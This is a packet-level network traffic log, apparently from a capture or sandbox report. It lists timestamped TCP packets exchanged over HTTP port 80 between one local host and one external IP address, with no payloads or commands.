Oct 24, 2024 13:54:23.033349991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033368111 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033370972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033385038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033387899 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033399105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033401966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033418894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033421993 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033433914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033438921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033451080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033453941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033463955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033468962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033484936 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033488035 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033502102 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033503056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033514023 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033518076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033535957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033536911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033552885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033555031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033569098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033569098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033585072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033588886 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033605099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033612013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033621073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033627033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033634901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033648014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033651114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033658981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033668041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033679962 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033684969 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033691883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033701897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033709049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033716917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033723116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033734083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033735037 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033751965 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033752918 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033768892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.033771038 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033791065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.033812046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.072433949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.072488070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.072494984 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.072525978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.072530985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.072561979 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.072597027 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.072607994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.072628021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.072637081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.072665930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.072669983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.072706938 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.141755104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.141825914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.141833067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.141900063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.141920090 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.141942978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.141957045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142015934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142062902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142071962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142117977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142126083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142163038 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142168999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142215967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142250061 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142263889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142285109 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142288923 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142316103 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142349958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142357111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142385960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142390966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142421007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142425060 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142456055 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142489910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142493963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142493963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142528057 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142535925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142560959 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142569065 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142597914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142601967 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142632961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142642975 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142671108 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142690897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142720938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142734051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142755032 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142764091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142791033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142807007 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142843962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142849922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142879009 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142904997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142919064 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142931938 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.142987013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.142993927 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143023968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143066883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143076897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143112898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143121958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143148899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143160105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143182993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143213987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143228054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143248081 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143256903 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143280983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143336058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143343925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143373966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143393040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143421888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143438101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143460989 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143476963 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143512011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143523932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143553019 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143564939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143600941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143620014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143637896 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143640995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143673897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143716097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143728971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143779039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143780947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143816948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143821955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143852949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143858910 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143893003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.143904924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143939972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143969059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.143986940 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144013882 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144021034 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144058943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144072056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144104004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144118071 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144171000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144205093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144217014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144239902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144239902 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144275904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144284964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144311905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144316912 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144346952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144355059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144382000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144388914 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144418001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144418955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144453049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144457102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144489050 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144507885 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144529104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144561052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144560099 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144561052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144597054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144630909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144643068 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144665003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144680977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144701958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144716978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144752979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144756079 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144797087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144809961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144861937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144866943 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144906998 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.144917011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.144956112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145009995 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145044088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145051003 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145066977 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145119905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145143032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145158052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145173073 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145204067 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145220995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145246983 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145255089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145288944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145303011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145328999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145332098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145376921 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145394087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145426989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145461082 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145468950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145513058 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145558119 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145570993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145616055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145623922 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145659924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145683050 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145704985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145711899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145745039 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145754099 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145775080 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145782948 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145817041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145828962 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145863056 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145868063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145898104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145905972 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.145935059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145967007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.145983934 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146001101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146033049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146042109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146066904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146080017 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146095991 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146130085 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146135092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146166086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146198988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146209955 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146251917 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146254063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146281958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146291018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146339893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146343946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146383047 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146394968 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146437883 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146445990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146480083 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146492958 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146521091 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146554947 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146554947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146569014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146605968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146610022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146647930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146680117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146697044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146714926 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146718979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146728039 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146765947 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146794081 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146805048 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146806002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146856070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146859884 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146928072 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.146938086 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146971941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.146981001 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147047997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147088051 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147099018 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147134066 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147145987 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147186041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147221088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147228956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147254944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147294044 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147295952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147345066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147365093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147398949 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147430897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147445917 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147465944 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147470951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147496939 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147505999 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147531033 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147542953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147568941 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147571087 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147603989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147609949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147639990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147640944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147674084 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147684097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147708893 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147720098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147742987 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147778988 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147795916 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147814989 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147840023 CEST	49714	80	192.168.2.6	95.182.96.50
